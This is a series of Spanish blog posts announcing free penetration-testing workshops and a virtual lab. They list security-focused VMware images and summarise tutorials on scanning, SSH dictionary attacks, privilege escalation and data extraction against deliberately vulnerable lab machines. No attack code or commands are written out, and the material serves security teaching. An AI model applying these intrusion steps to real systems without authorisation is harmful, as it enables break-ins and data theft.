Como especifiqué en la invitación, el HackLab se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y una segunda sección dedicada al Test de Pentración como tal, a un entorno virtualizado de intrusión.

Dejo a continuación el enlace al registro fotográfico del evento.

Registro fotográfico del HackLab 10 en Medellín >>

El HackLab será llevado a cabo en dos secciones. Un primera sección cubrirá algunas definiciones de  varias temáticas relacionadas con los Test de Penetración y la segunda sección constrará de una práctica de realización de un PenTest a un sistema virtualizado de intrusión.

El escenario propuesto es el siguiente:

Un empresa dedicada al servicio de Webhosting te contrata para realizar un Test de Penetración en uno de sus servidores dedicados a la administración de sus sistemas. Dicho servidor se encuentra en una de sus redes xxx.xxx.xxx.xxx. El objetivo consiste en identificar dicho servidor, descubrir y analizar las vulnerabilidades existentes en el mismo y penetrar el sistema.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda dicho e-mail confirmándole la disponiblidad del cupo.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Mekato (más que indispensable… mejor no vaya si no me lleva mekatos XD)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…) INDISPENSABLE!!!
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).
- Más mekatos
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 5 de septiembre de 2009
Hora: 2:30 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops y quieran llevarlo. Allá le hago el espacio y aprende con todos. De esta manera tenemos un espacio extra para otro interesado.
Les recuerdo nuevamente que estos HackLabs NO tienen ningún costo.

]]> http://labs.dragonjar.org/hacklab-10-medellin-pentest/feed 8 http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad http://labs.dragonjar.org/recopilacion-de-maquinas-virtuales-para-vmware-player-workstation-y-server-como-entornos-de-uso-para-laboratorios-de-seguridad#comments Fri, 29 May 2009 19:53:12 +0000 4v4t4r http://labs.dragonjar.org/?p=797 El siguiente listado de Imágenes de Máquinas Virtuales pretende ser un recopilatorio de  recursos de ambientes virtualizados enfocados al desarrollo de Laboratorios de Seguridad Informática. (PenTesting, Análisis de Malware, Hardening, Protección y Análisis de Datos, etc.)

Estas imágenes serán muy útiles cuando se pretendan realizar laboratorios que requieran diferentes Sistemas Operativos como máquinas “atacantes”  y máquinas “víctimas”.

Están desarrolladas para ser utilizadas con cualquiera de los productos de VMWare. Recomiendo el uso de VMWare Player y Server como solución al tema de licenciamiento, aunque es posible utilizar VMWare WorkStation en modo Trial por 30 días. Todas estos entornos ya traen instaladas las VMWare Tools para facilitar la transferencia de datos entre uno y otro sistema.

Pronto publicaré otras máquinas virtuales para otras soluciones de virtualización (Virtual PC, Qemu, Virtual Box).

Imágenes tomadas de BagSide:

• BackTrack 4 beta (Imágen de VMware con VMWare Tools).
  • Back|Track 4 beta, with KDE 3.5.10 Desktop and Kernel 2.6.28.1. Now based on Ubuntu Intrepid. Loads of specialized applications for admins. VMwareTools 7.8.4-126130 installed along with SLIM Login manager, some extra scripts and the gtk-qt-engine. Released 11th Feb. 2009. The appliance occupies 4.2GB of the virtual disk which is 25GB in total. Default RAM is set at 688MB and the download is 839 MB. Regarded as one of the top Security distros.
  • Página oficial de BackTrack.
  • Descargar máquina virtual.

• BackTrack 3 (Imágen de VMware con VMWare Tools).
  • Descargar máquina virtual BackTrack 3.

• Caine / Computer Aided INvestigative Environment (Imágen de VMware con VMWare Tools).
  • CAINE (Computer Aided INvestigative Environment) is a GNU/Linux Digital Forensics distro for Interdepartment Center for Research on Security (CRIS), supported by the University of Modena and Reggio Emilia in Italy. Based on Ubuntu 8.04.1 with Kernel 2.6.24-24 and GNOME 2.22.3. Fully updated on the 2nd of March 2009. Released on the 22nd of Feb. 2009. The dynamic disk is 40GB and the appliance occupies 3.5GB installed and the download is 683 MB. 588 MB RAM is allocated as default.
  • Página Oficial de Caine.
  • Descargar máquina virtual Caine.

• Helix 2008R1 (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.04 based Incident Response. Discovery, Forensics and Security Distro
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on the 03/10/2008. The source and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 23/09/2008. The appliance occupies 2.8GB of the virtual disk which is 14GB in total. Default RAM is set at 568MB and the download is 708MB in total. Works well here. For those of you who wants to use or try applications like Adepto, Autopsy, GtkHash, Linen, Ophcrack etc.
  • Página oficial de Helix.
  • Descargar máquina virtual Helix.

• nUbuntu (Imágen de VMware con VMWare Tools).
  • Ubuntu 8.10 remaster loaded with Security tools for Bluetooth, Cisco, Scanners, Password, Exploits, Database, Fuzzers, Enum, VoiP and Wireless. Some build-tools and VMwareTools 7.8.4-125130 are installed. Release date 17/12/2008. The physical disk is 9GB whereoff 2.7 GB is used for the appliance. The download is 566 MB and RAM set at 548 MB.
  • Página oficial de nUbuntu.
  • Descargar máquina virtual nUbuntu.

• Samurai Web Testing Framework (Imágen de VMware con VMWare Tools).
  • Security and web penetration test suite based on Ubuntu 8.04
    Kernel 2.6.24-21-generic with Gnome 2.22.3 Desktop. Fully upgraded on 08/10/2008. Headers and some dev-tools are installed as well as VMwareTools 6.5-118166. The resolution is DYNAMIC (drag the VMware frame to desired size). Distro release date 10/08/1008. The appliance occupies 3.0GB of the virtual disk which is 14GB in total. Default RAM is set at 548MB and the download is 675MB in total. Works well here. Loaded with intrusion tools: DirBuster, Fierce Domain Scanner, Gooscan, Grendel-Scan, HTTP_Print fingerprinting tool, Maltego CE, Nikto, Paros, Rat Proxy, Spike Proxy , SQLBrute, w3af (and the GUI), Wapiti, WebScarab, WebShag, ZenMap, dnswalk, httping, httrack, john the ripper, netcat, nmap, siege, snarf etc.
  • Página oficial de Samurai Web Testing Framework.
  • Descargar máquina virtual Samurai Web Testing Framework.

• WeakNet Linux (Imágen de VMware con VMWare Tools).
  • Security distro from WeakNetLabs. Based on Ubuntu 8.04.1 with Kernel 2.6.24-21 and GNOME 2.22.3. Fully updated on the 22nd of November. Released on the 20th of November 2008. Substantial amount of security tools including WeakNetLabs own code and a ‘dashboard’ with main applications. The dynamic disk is 20GB and the appliance occupies 3.6GB installed and the download is 848 MB. 612 MB RAM is allocated as default.
  • Página oficial de WeakNet Linux.
  • Descargar máquina virtual Weaknet.

• CentOS (Imágen de VMware con VMWare Tools).
  • Red Hat Enterprise based with GNOME 2.16 desktop. Installed kernel-devel, cpp, gcc, build-tools and VMwareTools 7.8.4-126130, Adobe flash plugin, Yum-extender, Yum-utils and gtk-murrine-engine and some iconsets. Release date 31/03/2009. CentOS is ranked no.10 on Distrowatch. The physical disk is 40GB whereoff 4.1 GB i used for the appliance. The download is 813MB. Very mature and stable although not bleeding edge.
  • Página oficial de CentOS.
  • Descargar máquina virtual CentOS.

• FreeBSD (Imágen de VMware con VMWare Tools).
  • Standard with the following added, Opera 9.63, MySQL Server Client, Ruby, Apache, Ark, compat6, Nano and a few more plus VMwareTools. Occupies 4.5 GB on disk off a virtual dynamic disk of 20 GB. 644 MB RAM allocated and the download is 904 MB. Works here after some serious tweaking and fixing. I must say that I have still problems getting to grips with all BSD’s as VMware guest OS desktops although this is probably the best one I have built so far.
  • Página oficial de FreeBSD.
  • Descargar máquina virtual FreeBSD.

Imágenes tomadas de Virtual Appliance Marketplace:

• Astaro Mail / Web / Security Gateway (Imágen de VMware).
  • Astaro Mail Gateway provides complete protection and control over spam, viruses, worms and Trojans transferred through email. The All-In-One mail security appliance features comprehensive features for spam detection and malware filtering.
  • Astaro Web Gateway provides complete protection and control over data transferred over the web. The All-In-One web security appliance features Malware Detection, Application Control, URL Filtering and Bandwidth Management, fully integrated and manageable through a single and intuitive browser-based user interface.
  • Astaro Security Gateway integrates complete Network, Web and Mail Security through an intuitive browser-based user interface. The Astaro Unified Threat Management appliance is the most easy-to-use and cost-effective “all-in-one” solution available, working to effectively shield businesses from internet based threats everyday.
  • Página oficial de Astaro Mail Gateway.
  • Descargar Astaro Mail gateway.
  • Descargar Astaro Web Gateway.
  • Astaro Security Gateway.

• WiKID Strong Authentication Server Community Edition 3.3.8 (Imágen de VMware).
  • The WiKID Strong Authentication System is a dual-source, software-based two-factor authentication system designed to be less expensive and more extensible than hardware tokens.
  • Página oficial de WiKID Strong Authentication Server Community Edition.
  • Descargar máquina virtual WiKID Strong Authentication Server Community Edition.

• Accellion Secure File Transfer (Imágen de VMware).
  • Secure File Transfer Virtual Appliance – secure, economical and easy to use secure file transfer for today’s global enterprises.
  • Página oficial de Accellion Secure File Transfer.
  • Descargar máquina virtual  Accellion Secure File Transfer.

• ShellNET MiniVM (Imágen de VMware).
  • Web Interface for managing Nessus Vulnerability Scans and results.
  • Página oficial de ShellNET MiniVM.
  • Descargar máquina virtual ShellNET MiniVM.

• JanusVM (Imágen de VMware con VMWare Tools).
  • Internet Privacy Appliance :: Encrypts your Internet traffic, hides your IP address, and is easy to setup.
  • Página oficial de JanusVM.
  • Descargar máquina virtual JanusVM.

• OWASP Live CD (Imágen de VMware con VMWare Tools).
  • The overarching goal for this project is to make application security tools and documentation easily available. I see this as a great complement to OWASP’s goal to make application security visible.
  • Página oficial de OWASP Live CD.
  • Descargar máquina virtual de OWASP Live CD.

• Fireball ISO Builder (Imágen de VMware).
  • Fireball ISO Builder is a VMWare virtual appliance that builds a bootable Gentoo Linux-base ISO image, focused on providing security and networking services to a network. IPv4 and IPv6. go6.net tunnel broker. DHCP, DNS, SSHD services.
  • Página oficial de Fireball ISO Builder.
  • Descargar máquina virtual de Fireball ISO Builder.

• Nepenthes VMware Appliance (Imágen de VMware con VMWare Tools).
  • Nepenthes is a low interaction honeypot like honeyd or mwcollect. Low Interaction Honeypots emulate known vulnerabilities to collect information about potential attacks. Nepenthes is designed to emulate vulnerabilties worms use to spread, and to capture these worms. As there are many possible ways for worms to spread, Nepenthes is modular. There are module interface to Resolve DNS Asynchronous, Emulate Vulnerabilities, Download Files, Submit the Downloaded Files, Trigger Events, Shellcode Handler.
  • Página oficial de Nepenthes VMware Appliance.
  • Descargar máquina virtual Nepenthes.

El HackLab fue gestionado y dirigido por Angelus_7722 y BadCode, quienes participan activamente en la Comunidad DragonJAR.

A continuación el primer video tutorial de desarrollo de este Laboratorio. En el aprenderemos y conoceremos sobre el entorno utilizado en este laboratorio, y como podemos comenzar con el montaje e importación de las máquinas atacantes y objetivo.

Descargar video tutorial (Password: www.dragonjar.org)

Para más información sobre el desarrollo de este laboratorio y la configuración de los ambientes virtuales visita el foro de resumen>>.

Muchas gracias a todos por el mekato que me llevaron… aunque ya se me acabó XD.

Como especifiqué en la invitación, el HackTaller se dividió en dos secciones. Una sección dedicada a algunos conceptos de Test de Penetración y BackTrack 4 y una segunda sección dedicada al Test de Pentración como tal a un entorno virtualizado de intrusión.

Dejo a continuación los enlaces al registro fotográfico del evento.

Registro fotográfico del HackLab 09 en Medellín >>

Registro fotográfico del HackLab 09 en Medellín en modo presentación >>

El Hack Lab estará divido en dos secciones. Una primera sección en la cual haré algunos demos de uso y configuración de BackTrack 4 Beta y algunos ejercicios prácticos a desarrollar por cada uno de los participantes.

La segunda sección cubrirá un Test de Penetración a un sistema virtualizado de intrusión. El escenario propuesto es el siguiente:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.1.xxx). El servidor a auditar permite que los usuarios y administradores almacenen archivos por medio de un servidor FTP. El trabajo consiste en descubrir las vulnerabilidades existentes en dicho servidor, intentando con todos los tipos de ataques que estén a su disposición.

Demostrar que el sistema es vulnerable sería la mejor manera de concientizar, pues desde allí se pueden implementar mejores prácticas en materia de seguridad Informática en la empresa.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el Hack Lab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmándole la disponiblidad del espacio.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Mekato (más que indispensable… mejor no vaya si no me lleva mekatos XD)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…) INDISPENSABLE!!!
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias).
- Más mekatos
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 14 de marzo de 2009
Hora: 2:00 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), lo hago de esta manera para garantizar de que todos estén cómodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.

Descargar presentación expuesta sobre Banner Identification

Más información y comentarios acerca del Hack Lab 02 en Pereira

Próximamente estaré publicando todo el material utilizado en este HackTaller, incluyendo los videos, herramientas y entornos virtualizados de intrusión.

Pretendo también realizar este Hack Lab en modo virtual para permitirles a las personas interesadas de otras regiones la participación activa de este tipo de eventos.

A continuación dejo el registro fotográfico del evento.

La idea es que a este Hack Lab puedan asistir las personas que se quedaron sin cupo en el anterior o que por uno u otro motivo no pudieron asistir.

La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.

El escenario propuesto para este Test de Penetración es el siguiente:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (Descargar imágen de máquina virtual BackTrack 3)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
– Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…) INDISPENSABLE!!!
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 21 de Febrero de 2008
Hora: 2:00 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo.

Para este Hack Lab se presentó el siguiente escenario de Test de Penetración:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.

Dejo a continuación el registro fotográfico de este evento.

Ver galería >>
Ver galería en modo de presentación >>

Nuevamente muchas gracias a tod@s l@s asistentes

La temática para este HackLab será nuevamente Test de Penetración, pero está vez profundizando aún más en la dificultad del entorno de pruebas.

El escenario propuesto para este Test de Penetración es el siguiente:

Una compañía te contrata para identificar las vulnerabilidades que se encuentran en una de las redes (192.168.2.xxx). Los hosts dentro de la red no son sistemas críticos y además recientemente se han hecho copias de seguridad que además han sido verificadas, por lo tanto no hay problema sobre cualquier daño que pueda ocurrir. La organización ha tenido multiples administradores encargados de la red en los últimos dos años, y estan inseguros de las capacidades del anterior (o actual) personal.

Nuevamente se harán algunas definiciones necesarias y relacionadas en lo que yo llamo el arte de los Test de Penetración, para realizar de manera guiada el mismo.

El proceso de inscripción será igual a los anteriores. Los interesados deben enviarme un correo electrónico solicitando un cupo para el hacklab, el proceso de inscripción se completa, luego de que yo responda este e-mail confirmandole la disponiblidad del espacio.

4v4t4r @ gmail . com

Todos las personas que alcancen a tener un cupo deben llevar algunos materiales indispensables para el Test de Penetración.

- Imágen de BackTrack 3 para máquina virtual. Este archivo puede ser descargado de manera directa desde el siguiente enlace. (Descargar imágen de máquina virtual BackTrack 3)
- Dispositivo de almacenamiento (preferiblemente superior a 2 gigas)
- Cuaderno de notas
- Comida para el profesor (papitas, chitos, gudis, rondallas, trocitos, café, etc, etc…)
- Muy buena disposición de aprendizaje y enseñanza (pues la idea es retroalimentarnos con experiencias propias)
- Desarrollar y/o visualizar los laboratorios realizados sobre Test de Penetración. Es muy necesario que vean y comprendan sobre los temas que ya se han tratado, pongo a continuación los videos de los trabajos realizados:

- Desarrollo del Laboratorio Virtual – Test de Penetración 1
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los ambientes virtuales de intrusión en Windows
- Desarrollo del Laboratorio Virtual – Test de Penetración – Configuración de los Ambientes Virtuales de Intrusión en Linux
- Desarrollo del Laboratorio Virtual – Test de Penetración – Escaneo e identificación del Sistema
- Desarrollo del Laboratorio Virtual – Test de Penetración – System Hacking
- Desarrollo del Laboratorio Virtual – Test de Penetración – Acceso a la Información Interna

Fecha: Sabado 14 de Fecbrero de 2008
Hora: 2:00 pm
Lugar: Tecnosoft – Parque Tecnológico, Boston (antiguo Colegio San José, ahora ITM de Boston) Cr 31 # 54 – 10
Cupos limitados: +/- 15 personas

Repito: Solo pueden asistir las personas que confirmen asistencia (el proceso de confirmación consiste en que me envía la solicitud y yo le confirmo por e-mail la reserva de su cupo), Lo hago de esta manera para garantizar de que todos estén comodos y no tengan que ocupar un equipo por dos personas, o peor aún que vaya y no tenga reserva de cupo.
Aclaro también y pongo a disposición sobre quienes tengan laptops personales y quieran llevarlo allá le hago el espacio y aprende con todos.
Les recuerdo nuevamente que estos HackLabs no tienen ningún costo… ya el que me quiera llevar cositas no me enojo XD.

En el siguiente video tutorial veremos como accedemos al sistemas con los datos obtenidos, veremos además como recolectamos la información sensible del mismo, como la podemos descifrar y como modificamos el archivo de configuración del servidor FTP para transferir los datos.

Con esta sesión damos por terminado el “resumen” de los laboratorios 5 y 6 realizados en la ciudad de Medellín, y al Laboratorio Virtual relizado en el pasado mes de diciembre. Solo bastará otro post a modo de conclusiones sobre el mismo y la invitación a que participen en los próximos

Descargar video tutorial Test de Penetración – Acceso a la Información sensible (Password: www.dragonjar.org)

Sin lugar a dudas el servicio de SSHD – Secure Shell Daemon es el más opcionado para ser nuestro primer objetivo.

En el siguiente video tutorial veremos como recolectamos información sensible de la compañía desde la propia página Web, además como hacemos uso de esa misma información para llevar a cabo un ataque basado en diccionario al servicio SSH.
Luego veremos como con base a la información y la interacción con el sistema se hace necesario escalar privilegios en el mismo. Todo esto y más en el video tutorial.

Descargar video tutorial de Test de Penetración – System Hacking (Password: www.dragonjar.org)

Es importante obtener la mayor información del Sistema, es por ello que hacemos uso de estas herramientas, y es por ello que debemos llevar el registro escrito de lo recolectado.

El siguiente video tutorial muestra el proceso de introducción técnica en el Test de Penetración, donde por medio de la herramienta Nmap bajo distintos perfiles de escaneo y varios intentos de conexión podemos obtener nuestros primeros objetivos: Escanear, identificar y recolectar la mayor información posible para determinar los posibles puntos de intrusión.

Descargar video tutorial de escaneo e identificación del sistema objetivo en el Test de Penetración. (Password: www.dragonjar.org)

En el siguiente video tutorial veremos como crear una nueva maquina virtual en VMWare WorkStation, como confirgurarla para que trabaje como el entorno virtualizado de intrusión objeto de estudio de estos Laboratorios Virtuales y como acceder a las intrucciones de desarrollo del mismo, utilizando como cliente BackTrack.

Descargar video tutorial de configuración del entorno virtualizado de intrusión en Linux (Password: www.dragonjar.org) – formato del video: .ogg

En el siguiente video tutorial profundizo un poco más sobre el proyecto de LiveCD’s como herramientas de prácticas de Test de Intrusión; Desarrollo original de Thomas Wilhem (De-ICE.net PenTest LiveCDs Project).
Además muestro el proceso de configuración y ejecución de los entornos virtuales de intrusión sobre VMWare WorkStation y Qemu.

En los próximos video tutoriales mostraré como llevar a cabo el montaje de estos entornos bajo ambientes Linux y el desarrollo del propio Test de Penetración desde BackTrack.

Descargar video tutorial de configuración de los ambientes virtuales de intrusión (Password: www.dragonjar.org)

La presentación no busca recrear por completo los temas tratados en cada uno de estos laboratorios, en lugar de ello presenta los apartes más importantes de los mismos, tratando de profundizar mucho más en los aspectos prácticos y técnicos.

Se hace necesario aclarar que en este video tutorial se presentan algunos conceptos a manera muy general, sin llegar al detalle como se ha hecho en cada una de las sesiones presenciales y virtuales, pues este solo busca nivelar y resumir sobre las sesiones realizadas a las personas que por diferentes razones no han podido estar presentes en estos, además de invitar a la comunidad e interesados a participar en los próximos.

La siguiente es la agenda a cubrir en la sesión:

- ¿Quiénes somos?
- Conceptos básicos sobre Seguridad Informática / Test de Penetración
- Estado actual de los Laboratorios de Seguridad Informática
- ¿Qué son los Laboratorios de Seguridad Informática Labs.DragonJAR.org?
- Laboratorios realizados
- Objetivo del Laboratorio
- Contenido del Laboratorio
- Materiales necesarios para desarrollar el Laboratorio
- Desarrollo del Laboratorio
- Conclusiones

Este video tutorial llega hasta la presentación y resumen de los laboratorios realizados hasta la fecha, definición de aspectos básicos la seguridad de la información/Test de Penetración e introducción en el ambiente virtualizado a desarrollar.

En los próximos veremos como podemos llevar a cabo el proceso de configuración y desarrollo del Test de Penetración.

Descargar video tutorial de presentación e introducción en el Laboratorio de Test de Penetración (Password: www.dragonjar.org)

Este será llevado a cabo el próximo sabado 20 de diciembre – 2:00 PM To 4:00 PM (GMT-05:00) Eastern Time (US & Canada)

Los interesados deben enviarme un correo electrónico, al cual yo responderé con el enlace al salón virtual.

4v4t4r @ gmail . com

La temática para este primer laboratorio virtual es la siguiente:

Test de Penetración 1 (Introducción y Desarrollo)

La finalidad de este primer Laboratorio virtual de Test de Penetración, será el ofrecer las técnicas, procesos y procedimientos necesarios para llevar a cabo un Test de Penetración haciendo uso de la Multi-Herramienta BackTrack.

Esto conllevará entonces a aprender y prácticar con ejemplos claros, sobre el uso de esta máginifica distribución. Además de las metodologías necesarias en un Test de Penetración.

Escenario propuesto:

El escenario para este Laboratorio es el de un CEO de una pequeña empresa que ha sido presionado por el Comité Administrativo para ser objeto de un Test de Penetración a realizarse desde la empresa. El Director General afirma que su empresa es segura, cree además de que este Test de Penetración será un enorme desperdicio de dinero, sobre todo porque ya tiene una solución de exploración (escaneo) de vulnerabilidades (Nessus). Para hacer “felices” a los del Comité Administrativo, él decide contratarlo a usted y le dá un plazo de 5 días para realizar el trabajo, pues como se mencionó él no cree que la empresa sea vulnerable a cualquier intento de acceso no autorizado.
Su tarea es analizar solo un servidor en el cual se aloja una página Web que ofrece información de contacto de la misma.

El Director General espera que usted intente con todos los tipos de ataques que estén a su disposición, pues está seguro de que usted no podrá vulnerar el sistema y obtener acceso.
Demostrar que el sistema es vulnerable sería la mejor manera de concientizar al Director General, para desde allí implementar mejores prácticas en materia de seguridad Informática.
———-

De esta manera hago la invitación a todos los interesados en participar. No existe entonces la limitación geográfica que muchos usuarios presentan .

Por ahora y como vieron en la descripción se hace necesario tener la distribución BackTrack.

La idea entonces es que descarguen la imágen y la configuren en una máquina virtual (VMWare Player / WorkStation / Server).
Como sugerencia personal preferiría que descargaran la siguiente máquina virtual ya creada, con las vmware tools instaladas y lista para ser usada.

Descargar Máquina Virtual BackTrack 3 (Desarrollada por Bagside)

Ahora publico el sistema que será objeto del Test de Penetración.

Descargar imágen de Entorno Virtualizado de Intrusion +/- 195Mb

La idea es que vayan leyendo los enlaces que publiqué anteriormente, además pueden ir descomprimiendo la máquina virtual BackTrack (+/- 1.5Gb).
Recuerden además que este laboratorio será desarrollado en cualquiera de los productos VMWare (WorkStation, Player, Server), aunque de todas maneras mostraré como puede configurarse en Qemu. Así que por lo tanto deben tener instalado cualquiera de esos productos (preferiblemente VMWare WorkStation).

El laboratorio promete, así que espero no se lo pierdan, mucho menos las personas de otras ciudades y paises que han querido participar en los Hack Labs que realizo en mi ciudad.

Para ese día deben tener un buen sistema de sonido (ej. diadema o audífonos, para poder recepcionar bien el audio).
Espero además que tengan una buena conexión a internet, pues algunos recursos así lo requieren.

Aún sigo esperando los correos electrónicos de las personas que estén interesadas, hasta el momento solo he recibido 8 correos, y solo puede ser transmitida la invitación por ese medio.
De la buena asistencia depende de que continúe o no con la realización y publicación de los mismos

Textos e información de interés:

http://labs.dragonjar.org/descubrimiento-de-aplicaciones-nmap
http://labs.dragonjar.org/video-tutorial-de-instalacion-de-backtrack-3
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-netcat
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-servicios-basicos
http://labs.dragonjar.org/test-de-penetracion-con-backtrack-conceptos-basicos
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-identificacion-de-banner%e2%80%99s-banderas-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-enumeracion-del-objetivo-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-ii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-scanning-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-i
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-iii
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-v
http://labs.dragonjar.org/laboratorios-hacking-tecnicas-y-contramedidas-ataques-por-fuerza-bruta-brute-force-vi

Creo que se ha cumplido este primer objetivo de comenzar a crear los grupos de estudio para estos laboratarios, se han nivelado conceptos relacionados con la seguridad de la información, y se ha hecho un primer contacto a las personas con un Test de Penetración.

Este Hack Taller 06 fué una repetición del anterior, pues como mencioné, todas las personas que estaban interesadas en asistir no pudieron hacerlo por falta de cupos, el objetivo entonces de esta repetición era ofrecer una “oportunidad” de poder estar allí, para compartir y recibir conocimientos .

